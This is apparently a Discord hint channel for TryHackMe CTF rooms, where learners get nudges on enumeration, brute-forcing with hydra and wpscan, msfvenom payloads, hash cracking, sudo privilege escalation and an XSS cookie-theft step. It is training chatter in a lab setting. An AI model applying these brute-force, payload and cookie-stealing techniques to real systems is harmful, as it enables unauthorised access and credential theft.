#room-hints
isn't it \\ not //
same thing
I don't see why i can't if there is a guest user
Try doing that without the -L flag
Ahh it worked thanks
That's because the "-L" lists the services available on the server, not the content of directories
ahhhhh lmao thanks for that
Okay im a little confused i got 2 pictures of dogs exiftool found nothing. ftp anonymous login had 3 files one being a bash script that doesn't seem to do much?
Well you got 3 files
right
A bash script and another one significant
Bash script + another file is the solution to get a foot on the machine
i don't understand
Read the bash script
What it does?
it's checking for files in tmp and deleting them and writing its log into a directory
And the other 2 files what they do?
nothing there just text files
There you are wrong
They are telling you something important
That combined with the bash scripts helps you
brain fried
I won't say much further here. If you really do not understand try to read the write ups. Though I suggest to not take this easy path and to try to solve it yourself
thats what ive been doing rather figure it out
Is there a way to edit the script on an anonymous ftp?
Then (don't know what time is at your position, by me is 02 AM) try to take some sleep and maybe come back on the machine tomorrow with new ideas ;)
oh no no. no time to sleep
Oh wait can i upload files to ftp anonymous?
What do you think?
Yes?
FTP= File Transfer Protocol
duh ahaha
im go try upload some payloads or something
bruh figured it out
how do i upload it?
curl -T /path/with/thefile.ext ftp://ipfromftp/path/to/thefile.ext (e.g)
?
Did you try Ctrl + C, right?
yeah but i meant everytime i use gobuster it happens
While gobuster still running?
thats the output from gobuster
I mean, you type: gobuster dir -u .... enter and already get this?
yeah
nothing it will just go to the end
Well, how can you use it if it doesn't work?
Are you still connected to THM?
Try using wfuzz
im not sure how to use wfuzz
wfuzz -w wordlist -u url/FUZZ
Are you able to access the site normally?
yeah
Burp or ZAP Proxy is running bg?
no nothing
Which room is this
Arrowverse

fail2ban?
me?
Yes
The room is called Lian Yu.
nmap still working?
!vpnscript
yeah nmap works okay sometimes it doesn't and i have to use -Pn
That sounds like a suspiciously broken VPN unless you're scanning a windows machine
how?
i only have one terminal running my config
it just killed my connection to openvpn lol?
wait im still connected some how wtf is happening
you're supposed to have sudo openvpn config.ovpn right
i don't know whats happened but it worked thanks i can now scan
Well, you live and learn always!
i don't know whats happened but it worked thanks i can now scan
@white salmon you had multiple vpns running
The script killed all your vpns you had running and then started up the one you're supposed to have running
but how if i only have one running in my terminal now nothing is running in any terminals yet its connected
Always good to understand what's going on
but how if i only have one running in my terminal now nothing is running in any terminals yet its connected
@white salmon it probably backgrounds it
ps -aux | grep vpn
Run that
Show the output
what does -aux mean
cheers my output is
@white salmon When you want to disconnect from the VPN, control C in the terminal where it's running and wait for it to shut down properly. Don't close the terminal as this often just backgrounds it.
@stuck fractal 
@stuck fractal i haven't done that. i just leave it open and click onto the next ctf
That explains why you had multiple vpns going then
why?
i haven't done that. i just leave it open and click onto the next ctf
@white salmon
am i supposed to close and reload every ctf?
No.
all i do is run the command once thats it
also could i get a small hint on Juin ctf task 1?
so far I've found the page username have a bruteforce running for the ssh and ftp while searching more directories
box: thompson
running tomcat...
tried default credentials and path traversal didn't work
Box: Cicada-3301 Vol:1 having an issue in task 5
any help with the command "outguess -r welcome.jpg ans.txt "
Reading welcome.jpg....
Extracting usable bits: 29049 bits
Steg retrieve: seed: 53476, len: 22525
Extracted datalen is too long: 22525 > 3632
getting this warning and nothing is printed
box: thompson
running tomcat...
tried default credentials and path traversal didn't work
@lyric oasis have you tried reading the page you get when you enter wrong credentials?
@eternal brook yup
got it
but when brute forced why didn't shown the creds @eternal brook
restarted machine now I'm not able to login
Can I get a big hint for the challenge in the room graphql?
restarted machine now I'm not able to login
@lyric oasis what creds are you using? It's clearly mentioned in the page just login with those creds
it worked after i rebooted my local system
thanx man @eternal brook
Cool np, please delete that credentials message @lyric oasis
@eternal brook done
my last question ... why bruteforce not worked on login @eternal brook
Bruteforce depends on what wordlist you're using I'm not sure if those creds are there in rockyou.txt also you need to know the username, bruteforcing both username and password is not a good idea.
Which wordlist you used for username and password?
i used tomcat default credentials list using metasploit
Are those creds available in that wordlist?
yes
Can you share your hydra command?
Oh there can be various reasons for that not working wrong settings of the module or it might not be the right module
Lemme check it giveme 5 min
ok
Can you send show options ss?
screen shot?
Yeah
one min
Also link to the wordlist you're using
It's working now?
Any hints on HiddenFlag in PostExploitation Basics.
Part 1: PowerView
It's working now?
@eternal brook nope
Ok strange idk mayn never used Metasploit for that bruteforce ..... hydra with that wordlist should have worked fine
@eternal brook yeah it's weird
hydra also didn't work
Morning everyone
everyone i dont understand this task
what room is that?
Zthlinux/Learn Linux
@stuck fractal You really never sleep. lol
You just don't see me sleep
@steady ridge What have you tried so far?
If a tree falls in the forest and no one is around, does it make a sound?
@stuck fractal Facts.
You just don't see me sleep
@stuck fractal ~~I do ~~
:R1_60: everyone i dont understand this task
@steady ridge escalate your privileges to root so you can read the flag
@stuck fractal Have a good one. I told you I would try to pop in more often.
Hi, guys. Can you give me some hints about overpass-1
you need to be a little more specific @white salmon, that's not really how hints work... what have you done, what are you stuck on? use spoiler tags (surrounding the spoiling part with ||) where necessary
@median compass okay, thanks a lot
@steady ridge you need to get your hands on the root.txt n submit the contents of it
Hi, in OWASP room task 19, the hint says to look at the source code to look for default credentials, so do I understand well that I need to look at the website's code in the Debugger?
@simple phoenix Nope - Right click on web browser page and select "View Source" to see the HTML/CSS code etc..
I've not done the task, but does it suggest using Burp Suite at all to view the GET / POST requests?
actually it ended up being something entirely different but I did Git it
anyone else has a problem at metasploit on task 5?
What's the problem with it?
Could you show a screenshot of your options please
Wrong LHOST
then what should it be?
Type ip addr in your terminal and look at the tun0 ip that is your LHOST
Back to the MITRE room. Task 4, Section 3. "For the above analytic, what is the pseudocode a representation of?" .. I am still not getting what they are asking for. I cannot figure out how to get a pseudocode from the tactics list under the tactic. I know the category is marked as ||Persistence|| but i cannot find any pseudocode for it, I do find pseudocode for 17 items under that tactic, but the question does not seem like it's geared towards a specific entity rather the tactic as a whole.
It took me a while for this one but it's actually in the task and it's right in front of you but you don't realise it
Oh geeez
My issue was I could not figure out if they were referring to the previous question, or something else.
Thinking about a better way to phrase that question, feedback time
@fleet pike saw this and wondering how you would reword that question so the objective is more clear. thanks
@remote gate The confusion is that a different question is asked .. changing tactics and whatnot.. then you decide to switch back to discussing the example text. I'd probably cite "In the example analytic above, ...
Or in the example above
As opposed to above analytic (after that other question. its hard to mentally switch back.. and you end up going on a treasure hunt on CAR's website
alternately, you can switch the order
Make that question the higher one so you are still thinking in terms of the example, and then you switch gears and go to car's site
Psycho Break : task 2 how i can free from laura
Can anyone help with the CSP room? Stuck on this question: What directive-source combination should we add to our policy if we want to specifically block all JavaScript content from running on our website?
@last trellis Run!
@hollow maple saw shell and did relative path took me half hour even after writeup hint
Hello, I am stuck at the Blue Steel Machine... I am not sure if it's a bug or what I am doing wrong, I checked three different write ups, and I followed correct steps, but I keep getting error at the Task 3 during Privesc.
The error:
ERROR: Start-Service : Service 'Advanced SystemCare Service 9 (AdvancedSystemCareService9)' cannot be started due to the
ERROR: following error: Cannot start service AdvancedSystemCareService9 on computer '.'.
ERROR: At line:1 char:1
ERROR: + Start-Service AdvancedSystemCareService9
ERROR: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ERROR: + CategoryInfo : OpenError: (System.ServiceProcess.ServiceController:ServiceController) [Start-Service],
ERROR: ServiceCommandException
ERROR: + FullyQualifiedErrorId : CouldNotStartService,Microsoft.PowerShell.Commands.StartServiceCommand
ERROR:
Not sure if this is correct place to ask though...
show a screenshot please
As you can see, meterpreter session opens for a while, but it closes in like half a minute, with an error which says "reason: user exit"
Try sc qc
Generate a exe-service payload in msfvenom
Make sure your set payload in multi handler is exactly the same as your generated one
saw shell and did relative path took me half hour even after writeup hint
@last trellis The first time I got stuck after I found this out, but I got a hint and this saved me
Created the payload
Same error...
I did the same thing but manually and I receive the same error
Room : Relevant, Found the creds from smb enum, tried rdp, eternal blue and stuck. Any hints?
@open storm reset the box and try again
I tried that as well... well I'll try again and see
It could be that you're using msf6
It's unstable
I'm not sure if it's gotten better tho but from what I've seen it's known as unstable
@open storm exe-service payload
That's the -f format argument
-f exe-service
The payload you set in multi/handler and the payload you're using don't match either
They neeeeeed to match
well the payload does match... but I changed the "-f exe-service" and it works now
thank you for the help!
Hello, someone can help me for the scripting room task 2 ( [Medium] Gotta Catch em All )
Hi, can somebody help me with marketplace ? I can easily get ||my own cookies|| but not ||admin's cookie|| no ideas what I am doing wrong
@urban wraith have you tried starting a web server with something like the python http.server module and sending them?
@hasty gust if you are stuck there you'll get mad once you get to the CSP Sandbox
one of the sources says exactly what they are asking for..
one source fully disallows loading resources of the specified directive type from anywhere....
that's the one you need to use under your script sources policy
@remote gate, yes I have a python web server running. It works and I can retrieve the ||cookie for the user I created. || But then, I get nothing when I ||report the listing I created with the payload inside||
@urban wraith could you pm me what you're trying please?
Would anyone by chance be able to give me a nudge on
https://tryhackme.com/room/mitre ; Task 4: CAR Knowledge Base
Q: For the above analytic, what is the pseudocode a representation of?
I've tried searching for the pseudocodes of both the CAR-2014-004 and 2020-09-001 but neither of the pseudocode representations appear to be valid when I try them unless I'm misunderstanding something
Room: Network Services
Task 4, Question 4
I have to look around for any interesting documents that could contain valuable information. The ls command is working and I can see a "Working from home...txt" but I can't see what it contains. I have tried cat, tail, vi, vim, nano, head, less but I keep getting command not found. Could you give me a little hint?
you'll want to research into how you can go about getting it onto a system that does have those commands
ok. I'll try this. Thanks
when connected in smbclient there is a help command @jovial sentinel that shows you all the commands that will work there
^
@remote gate did that help you any?
@karmic sky, look at the CAR-2020-09-001 link again and re-read what it says about the pseudocode
@jovial sentinel There are some commands that can be multipurposed.. These commands are inherent to all shells, and they have so many uses.. For example. echo .. learn how to use echo properly
@fleet pike yeah that makes sense. i think moving that question up one will clear the confusion. ill message the creator with the feedback. the reason why i was asking is I tested the room and try to look for stuff like you brought up
Did you get tripped up as well?
i didnt on that one but now that i see it again i can see how
@jovial sentinel For example echo "Anarchy rules" ... but it can be used in place of Cat, Ls, "erase", "write" .. you can redirect data from it to other things or objects, and from other things or objects to echo.
..<
I wasn't sure if room hints was "Point them in the right direction" or "give them a working comparable syntax"
thanks for the feedback @fleet pike. i messaged them. this obv isnt my creation so it'll ultimately be up to them to make a change. ill try to keep something like this for the next room i test
Hints should always be more focused on ways that one can search for their own answer, or how to fish so to speak
@remote gate I think honestly that just moving the question would be the path of least resistance. I still have a few more questions on this one i have been hitting the wall on
As I understand it
speaking of which, did you get it @karmic sky?
I did, the question is a tad confusing since it mentions "The above analytic" when it's referring to the first analytic on the page
I thought I was going insane but it'd been right there the whole time
I managed to get the content of the file with one of the available commands. In the meantime, I've been familiarising myself a little more with echo command and it is pretty interesting but I still can't actually read the content of that file using echo
I mean, I wanna try this just for fun/learning purposes
I have tried something like this: echo "$(cat Working\ From\ Home\ Information.txt)"
@fleet pike he swapped the question. thanks again for the feedback
Nice
I'm assuming this is showing me how to properly use that command but...I can't make it work 
typically with smbclient the easiest thing to do is transfer the files to your attack box where you can do what you like with them @jovial sentinel
@median compass ok, this is new. I noticed that the last question of this task is to transfer that file to my machine. I'm working on that
enjoy
Any hints on the enum part of year of the owl
too soon for hints on yoto, 72 hours from release means nothing till 8pm GMT tomorrow
Ok buddy
managed to get the id_rsa on my machine. gave enough permission with chmod. why does it say invalid format?
which room is this @jovial sentinel?
Room: Network Services
Task 4, Last question
where did you get the username for the account from?
don't worry about the format for now, check your other parameters are correct
@jovial sentinel you can get that error even when the key is valid and lets you in. Ignore it.
where did you get the username for the account from?
@median compass it is said in one of the questions above
That's the user for SMB
oooooh, right
Unix usernames are always lower case.
so what's happening is that you're asking it to authenticate with that key against a user that doesn't exist, that's why it's not going any further
*key
so what's happening is that you're asking it to authenticate with that key against a user that doesn't exist, that's why it's not going any further
@median compass yeah, I knew that but I messed up thinking Anonymous is the user.
Now I solved it by trying "combinations" with the name I got from a previous question. Is there any other way to find the name or I did the right thing getting his username from that letter?
no, that's often the way, an educated guess based on what you've learned from enumerating
Thanks and Sorry for bothering with so many questions but I want to learn everything properly
no problem, that's how you learn
hi there, i'm in room Blue task 4 question 2
the goal is to find the password from a hashdump
i've tried to separate the hashes and run it through hashcat (hashcat -m 0 -a 0 myfile.txt rockyou.txt)
tried not moving a thing and run it through john the ripper (john --rules -w=rockyou.txt myfile.txt / john --show myfile.txt)
but i can't seem to crack the freaking passwords
... could you help me?
@maiden kite did you figure it out?
@maiden kite make sure that you are specifying the right hash algorithm type via your cracking app. Do you know what the right one is for ntlm?
I need some help with the room "Jack"
I cant brute force the wordpress user. My wpscan crashes everytime after a couple of minutes
show a screenshot please
It says "Scan aborted: invalid byte sequence in UTF-8". So its a problem of my wordlist right? But its rockyou xD i mean....
show a screenshot please
and your command?
wpscan --url=http://jack.thm/ -U users.txt -P /usr/share/wordlists/rockyou.txt --password-attack xmlrpc -t 1
-t 100 sry
Or am i using too many threads?
wpscan --url http://jack.thm/ -t 3 -P /usr/share/wordlists/rockyou.txt -U users.txt
Ok ill try that. But it will take hours....?
try to use a shorter wordlist
try fasttrack.txt
@rigid dagger do some enum first to find out some usernames ig idrk
I found the 3 users ty
thanks @Rick Next time ill stage my BF attacks starting with smaller wordlists and increasing them
Any hints on the initial foothold for year of the owl?
Ohh.. didn't notice, cheers
@fleet pike nope, i'll have to read a little more about it :)
Thanks!
I'm doing "CTF collection vol 1 - Task 17 - A sounding QR" where I have to listen to a soundfile playing the flag. But I just can't understand all the letters that is being said. Anyone with a tip on how to understand all the letters ?
If you want, send the audio to me in a dm and I'll tell you what it is saying
Try to play it slow motion
Maybe it will be easier to hear
I only have the link to the website, where it is playing. Not the actual file it self
Send me the link
I just did. Thanks
well, that sucks. My subscription ran out and all that work on the Linux Challenge room is gone.
@stone oyster It's not gone.
well, I can't access it until I resub
could i get a hint on nmap T1? i tried googling but nothing
actually nvm im an idiot
Yo my fellows Hackers
Need some hints for mrrobot
Key 2 !!
I modified font color of page and another stuff but nothing ...
Try to get access to the Wordpress site @fallow sapphire
@oblique cliff okay , so let's bruteforcing login page with the "fsocity"
Which category in metasploit help is this under?
"How do you show options in a specific category"
@oblique cliff okay , so let's bruteforcing login page with the "fsocity"
@fallow sapphire first find out a valid username
Then yes, but you can make it much faster
Which category in metasploit help is this under?
"How do you show options in a specific category"
@white salmon show options is for help
wot
no like how do you show options in a specific category
like which category would it be in under help in msfconsole
Then yes, but you can make it much faster
@oblique cliff User found !!! Password lefts ...
i just went through entire help for metasploit n nevr found anything about this
How do you show options in a specific category
i just went through entire help for metasploit n nevr found anything about this
@white salmon Category ... Example??
Modules have options
the payload is one of those
The payload then has options as well
So if you choose the element, payload for Example , you have to run show option ...
could i get a hint on t2 fsociety
@white salmon mrrobot room ??
yeah
@white salmon did you find the right login ?
no i have the dictionary. but no username im entering random logins onto forgot password now
@white salmon So bruteforce first for finding right Username then password
you can do that?
@white salmon yeah try with burp
not sure how with burp
So pick your best tool
hmm okay thanks
lord have mercy
@white salmon wow what tool ?
i don't have burp pro to load a list
@white salmon no need burp pro , i use burp community
not working for me
@white salmon some misconfiguration i think
Year of the owl, drives me mad, cannot see anything obvious, any hints? I hope it's not bruteforcing and fuzzing, I don't like it 
Hints are up to @inland onyx
i think hints are disabled till next week? idk
Give it a few more roots
Not least because there are about three people plus myself capable of giving them
Year of the owl, drives me mad, cannot see anything obvious, any hints? I hope it's not bruteforcing and fuzzing, I don't like it
@narrow barn You do not have to bruteforce that webserver
Or the DB, for that matter
Muir i cannot stream that room in Discord right?
Not yet, please
Give it until Friday
The writeup probably won't be out then, because not enough people have finished it
not even gained user ahaa.. but yes!
But nothing stopping you streaming it then
@inland onyx hmmm, ok will try to think of something, thanks!
ill try my best to get atleast a shell this week
Enjoy!
Hi there is a room names sublist3r
There is no writeup for that room
And I m having only one question left
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
I m on room : sublist3r
Stuck at task : 4 scans away!
We have to run a sublist3r scan here and I did it successfully
And after that after trying to look at writeup and also searching on Google I was not able to look for the valid answer for question number : 5
There is no writeup for that room
@orchid root
||https://www.youtube.com/watch?v=yXppnZZxkPg||
room: https://tryhackme.com/room/rppsempire
task 8: question: What MITRE ATT&CK technique is associated with powershell/trollsploit/voicetroll?
It is not ||T1059|| Can someone give me a little hint pls.
i already used google. but i always ended up at ||T1059||
I have a question about the Food KoTH. I've already found all entry points and all privilege escalation techniques. I want to know how to patch the ||telnet ROT12 password which is in the description/header of the service when running it; before putting the user and password id|| I kept looking for a configuration file but I cannot find anything
Change the password
There is a configuration file for it, I think it's one of the MOTD files?
@oblique cliff what tool have you use for Bruteforcing ?
@lime verge /etc/motd, 99% sure
Wpscan
Thanks for the answer. Yeah changing the password is the reasonable thing to do. There are a bunch of motd files but I cannot rly be bothered looking at all of them. From an easy patch perspective, changing the password is the best way to go
/etc/motd is not there and /etc/issue has something else
Does not matter really I'll stick with the obvious one
@white salmon something about defacing?
Wpscan
@oblique cliff okkkk
@white salmon If you open the module in Starkiller it will tell you which MITRE ATT&CK technique the module uses
help! can I have a hint for room NIS -linux part I task 9 "xargs" please ?
@flat granite what do you have so far?
@flat granite no worries. thats reallyy close. just missing the very end
@flat granite why are you using /bin/xx ?
anytime
@flat granite btw, when you get to wget task just ignore the ** to build your command...there is a typo. just do your research and put the command you'd use
thank u @dusk violet!
Is there a way for me to bypass Permissions held by root?
It says that my login has permision to execute a command that I need to use, however it says Permission denied
which room
Linux Challenge, Task 4, Question 8. Looking for Flag27
did you check which commands you can run as root
yes i've tried sudo -l and this is what gets returned:
||```User alice may run the following commands on ip-10-10-163-214.eu-west-1.compute.internal:
(ALL) NOPASSWD: /bin/cat /home/flag27
so you can cat a file
yes, however when I try to cat the file it tells me Permission denied
did you try sudo nano
I have not, ill check what it does to get a better understanding, perhaps I overlooked nano
sudo cat I mean
Oh yes, I have, but that returns this as well:
Sorry, user alice is not allowed to execute '/bin/cat flag27' as root on ip-10-10-163-214.eu-west-1.compute.internal.
show me your command
Matching Defaults entries for alice on ip-10-10-163-214.eu-west-1.compute.internal:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on ip-10-10-163-214.eu-west-1.compute.internal:
(ALL) NOPASSWD: /bin/cat /home/flag27
alice@ip-10-10-163-214:/home$ sudo cat -n flag27
[sudo] password for alice:
Sorry, user alice is not allowed to execute '/bin/cat -n flag27' as root on ip-10-10-163-214.eu-west-1.compute.internal.
try sudo cat /home/flag27
that worked!
If you have the time could you explain why that worked but just catting the file itself didnt?
i'm not sure
all good, thanks for the help, ill most likely be back soon
I've returned, im now on Q10, i've removed all the spaces and newline spaces. what should I do to split by comma and get the last element in the split?
Can someone help me on Linux Challenge Task#2 Q8? I tried to ||tar --unzip flag8.tar.gz|| but it isn't working for me. Am I missing something?
wrong command @devout seal
have we started giving YOTOwl hints? @inland onyx
@hasty slate nah, give it a few more roots. I'll field some vague ones though
okay sure.. ppl are dm'ing me actually. (let's ignore rule 1 for a bit lol)
@white salmon If you open the module in Starkiller it will tell you which MITRE ATT&CK technique the module uses
@terse moss Thank you for the hint.
YOTO...
I think I know what I need to do to get initial foothold, tried few things, didn't work .. not sure what to use because of lack of information
I can see the service as 'http' but the answer format is a bit lengthy, couldn't get around this ..Any hints?
you're very close
http is a protocol, if you had a daemon though
does that hint make sense? I just woke up lol
Oops I got it Haha ! Thank you
If you have the time could you explain why that worked but just catting the file itself didnt?
@grizzled berry Sudo permissions are very specific. The sudoers entry specifies you can use /bin/cat on the file at that location by full path so you need to use the full path
@stuck fractal That makes sense, thanks!
box:anon force
got user flag. via ftp.. bruteforced ssh.... no results....
room: introtoexploit missing one question tin task 4 question 3 What data type does the payload need to be? need a little hint tried bytes, json and so on but doesn't match the hints "*"..
yoto root part ?
if you read the text above regarding writing the exploit, it tells you how the five random alphanumeric characters are stored @mild eagle
I think muir wants to leave hints on YOTO for another little while @limber iron, perhaps talk to him directly for a nudge?
okay thank you budddy
I need some help with the Linux Challenges room, T5 Q5. Having trouble finding where my personal $Path is stored
echo $PATH?
try a google @grizzled berry "linux setting environment variables"
if you read the text above regarding writing the exploit, it tells you how the five random alphanumeric characters are stored @mild eagle
@median compass ha ha tnx was so focused on the data part tuples and so on..
i've finally made it to the last question of Linux Challenges. I'm supposed to find which person is a part of a hacker group, which I did, but now I don't know what to do with that information
try looking for files that such a person might own @grizzled berry
thanks @wintry yarrow @median compass @white salmon and everyone else that helped me
im getting an unhealthy addiction to completing these rooms
I don't know where I helped but you're welcome. 
did you fully enumerate ftp @lyric oasis ?
@median compass yup..... searched all files
You were moral support
i've been doing this room for a long time and I remember you helping at some point
but yes I appreciate the moral support
Np, happy hacking! 
and did any of those files seem useful @lyric oasis?
@median compass the .wget-* file sus
screenshot maybe @lyric oasis?
can i dm @median compass
sure
@median compass i was like idiot searching only home dir , but it was in root
cracked it and got the pass
that's a bit of a spoiler @lyric oasis, perhaps surround the solution part with || tags ok?
and well done
sorry achoslav, your nick comes up first when typing @ proxy
Can I get a hint for the bonus task in the learn linux room?
greetings everyone. linux challenges task 2 Look at the systems processes. What is flag 7. I am stuck here. May I get a hint please?
Can I get a hint for the bonus task in the learn linux room?
@silk nexus take a look at the files owned by each one of the users
greetings everyone. linux challenges task 2 Look at the systems processes. What is flag 7. I am stuck here. May I get a hint please?
@wind peak take a look at ps manual page and see how can you show all the processes in the system
ps -e
looking at them i still dont get it
or ps -A
same thing
maybe im burnt out or something
ps ax
okay
gonna lookup what that x flag means
thank you
Just a general question here not aimed at any specific room. Are we expected to use google sometimes?
you're expected to use google ALWAYS
google is our friend
thank you i love google
ps aux @wind peak
the x lists all processes that don't have a TTY associated with it
The a displays all processes running
The u shows more details about the processes
Thank you @white salmon
Im stuck again ppl. Tried looking in etc for motd and its not in there. i did however find a cool text that says try hack me. Can anyone tell me where MOTD's are usually stored?
please?
okay
dont worry to answer
i found it
i think i need a break lol
Hi I m doing room : printer hacking 101
And stuck at task 3 : I have deployed the Machine but still the script isn't able to find the machine
They asked to use script : pret.py
the script is to discover prints on your network
@woven mirage yes
the room teaches you how to use it but in this situation you already have the ip of the printer
But as I have deployed the machine and connected using vpn! Still I m not going to see a printer in it??
you deployed a machine
the machine is the printer
you dont need to discover printers on the network, you already got a printer deployed for you
you need to visit MACHINE_IP:631
Wow I got it thanks! I thought the script will find that deployed printer
i have another question. i plan to go through all the learning paths. will i be able to do bug bounties after that?
i honestly want to make a career out of hacking
i don't think bug bounty is something that you can make a career out of, it depends a lot on luck
also, i think this question would be more appropriate in #cyber-and-careers
Thanks @woven mirage
Hey all, I am stuck on flag 16 of linux challenges
I am confused about the system mounts as I have searched through the typical ones such as /run /dev/ proc /sys
Hi ! In printer hacking room
I m not able to make ssh connection I don't know why I have typed every command correctly
On room Common Linux Privesc, T6 Q3. I've inputted the command that it told me to and I get spit out a hash, but the problem is that when I try to put it in as an answer it tells me its wrong
what hash did you get?
|| $1$new$p7ptkEKU1HnaHpRtzNizS1 ||
thats the whole line im being returned
im assuming that whole line is the hash
yeah correct
you see Rick, I don't know what kind of wizard you are, but when I put it in to confirm that it was wrong like all the other times, it worked.
Check for extra spaces up front and back like I said - sorry for the confusion.
all good Lars, for some reason whenever I put it in before it didn't work, but once I asked for a hint, it suddenly works. I'm really not sure what levels of stupidity im running on right now
im running rooms at 4am 
I don't know why I get the motivation to run rooms at this time of day
Probably the dark and switching console to green text is what does it
I'm using PuTTY with an OpenVPN connection because the attack box gives me lots of trouble, I have yet to change the color profile
That's dedication, I just run a massively overprovisioned Kali VM myself
Room: Blue
Task 3
I am trying to run the exploit from the below screenshot and I can't make it work. I have tried to redo all the steps from the beginning and still no success. Any hints please?
and these are my options:
You already have meterpreter shell I think.
yeah, I have, but it is from a previous task
and I put that shell in background with ctrl+z and now I have to follow the rest of the room but I m stuck there
You already have meterpreter shell so no need to upgrade it.
so, you need a normal shell in order to elevate it to meterpreter, a meterpreter is the highest you can get @jovial sentinel
if you want to use that module you need to change the payload to a different shell other than meterpreter, which will then allow you to use the module in the screenshot, does that make sense?
actually, yes. I have watched the video available in the beginning of the room and I noticed the differences and your responses really made me completely understand. Thank you guys 
no worries
you can also use the metasploit unleash course to get a better understanding of metasploit if you want to
I will definitely do this. I find Metasploit really interesting and I think it would be really helpful to know this better
yup, that's the most documented you can get for free. Other paid alternatives are from SANS with the Metasploit Kung-Fu or something like that
well, the Metasploit room from here was quite helpful as well
given the fact that I am a complete beginner and (until now) I only heard of Metasploit, it gave me some nice information
that's good, Dark does really good content so we are happy that you managed to learn something!
I really did. I am still on the "beginner path" (so I did not start so much time ago) and I already feel that this subscription is one of the best things I have ever spent my money on. so, good job guys
Hello, in the vulnersity room we ask directory that has an upload form page but when you paste the address deploy in the url we cannot have a page. How to do?
Which port? I cannot see any port in the room
Except the exercise gobuster where the command specific the port 3333
I'm lost
did you do an nmap on the box as instructed @amber cave ?
and answered Task 2 question 7 yes?
@median compass yes i'm in the three task
@median compass yes it's ok
well that's the answer to james question, that's the port
so now you do gobuster and hopefully you can answer Task 3 question 2
They found the directory
and then you use that answer to find the form http://IP:PORT/directory
They're unable to access it in their browser probably because they missed the port
just trying to explain the why
Ok thanks i understand now
Hello guys, for the https://tryhackme.com/room/25daysofchristmas room, task 6
am in supposed to brute force my way in first to get the cookie or the cookie is supposed to appear once I land on the login page?
You need to sign up
Hi guys! I am trying https://tryhackme.com/room/rpwebscanning task 3. I need to set a ZAP option to "specify what we are attacking". I don't know what to do in the ZAP gui. Any hints?
@frail skiff there should be a Quick Scan tab on the main screen with a field called 'Target' where you specify the IP address
Thanks! I will try it now
Team, I need some help on Flag 19 on Linux Challenges (Task #3, Last Question) I am trying to run the sed command with -l but I am not getting anything. I am also specifying the number. This is what it looks like: ||sed -l 2345 flag19||
Am I missing something?
Nevermind, I used something else other than sed
Anybody else manage to root basic pentesting via tomcat port 8080?
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done.
im stuck in blue
Rex::ConnectionTimeout: The connection timed out
this comes always
What are your metasploit options
In the room BruteIt and I am currently up to password #95,000 in the rockyou.txt file. Is my Hydra command wrong? If so please give me a hint on what may be wrong, not necessarily the correct command if possible.
||hydra -l admin -P /usr/share/wordlist/rockyou.txt http-post-form "/admin:user=^USER^&pass=^PASS^:F=Username"||
As far as I know there is a general rule that brute force shouldn't take longer than 5 minutes. In your command @ashen matrix you should check the location you entered in the options section again
Can anyone give me a slight hint for the room "Year of the Owl"?
On the initial enumeration
don't post the same question in multiple channels
Using the nmap flag -n what will it not resolve
@ashen matrix yeah, your command is incorrect , check and change your parameters according to the website
@ashen matrix i think but not sure but f indicates the error msg you get once you login with invalid creds
im in the vulnversity room
Using the nmap flag -n what will it not resolve
this is my qs
google it
but can u tell something abt it?
cant you google it
or do nmap --help or smth or whatever command that shows you all the options
i have been doing your room https://tryhackme.com/room/lle
i am stuck in task 7 question 2
i searched in gtfobins also but the answer is not in format which they have provided can anyone give a hint for that ?
@frail rain @fiery moth I did set F to ||Username or password invalid|| and it faults instantly with saying 16 passwords are correct when they arent.... is that the right track tho?
there is something wrong with it
ok thank you. i will work on it then
ill give it a go thank you
imma compare it with the one i used to solve the room and i will lyk
or maybe try like http-post-form "/dirname or filename/"
he did
/admin
oh i see it now
thank you potato
I think.. will let you know
@fiery moth I think i missed something from it. trying something different to test
can pvt message you what i think i was missing
@ashen matrix can you send me the command you used with the login: function
Hey , I'm doing RELEVANT room and I've collected the password.txt in smb and kinda confused what to do next. .. I'm running gobuster on http and it's giving me timeout errors ....
Any help !? Tag me when u ans
not tried
after finding the login credentials , i was hoping to find something on webserver
Try putting things in and see what you can do with it
Does anyone know local file reading using [src]xss
Room:inacave
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
*Edited
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
That's a new room
@jagged scaffold they are encoded in ||base64||
i can help you but i dont think i am allowed to
You're sending them in the wrong direction.
if he already knew then he needs to run a gobuster scan
They did
once he does and finds the "hidden directory" it will point him out to the right direction
Hey @fiery moth , actually I already tried gobuster and it was giving me timeout errors
port 80 is open so you should be able to run gobuster
if gobuster doesnt work try dirsearch
also look for other ports too to run dir scans on
Anyone able to give me a hint on the Learn Linux room's "Bonus Challenge - The True Ending"?
I'm logged in with ssh as shiba4 but can't find anything yet
@jagged scaffold dirsearch is the way
for each user that you have try to look for files that they own in the system (find with a switch). One file will stand out as being in an odd place @cosmic phoenix
Thanks
@median compass I've completed the room... interesting anonforce room..
good stuff, well done
Just an FYI @median compass thanks for the ping. Pulled into #talk-with-us-no-threading but they left the server shortly after. Ban has been issued (:
yeah, sorry for the direct ping but wasn't sure how best to ring the bell, usual kiddie stuff I assume, need haCKzz
Yeah absolutely (:
Any Mod/Staff that's available is the best way to get it dealt with, appreciate that
I'm stuck while solving year of the owl room, any hints for this I've analysed smb but no clues. If anyone solved this pls do give me some hints
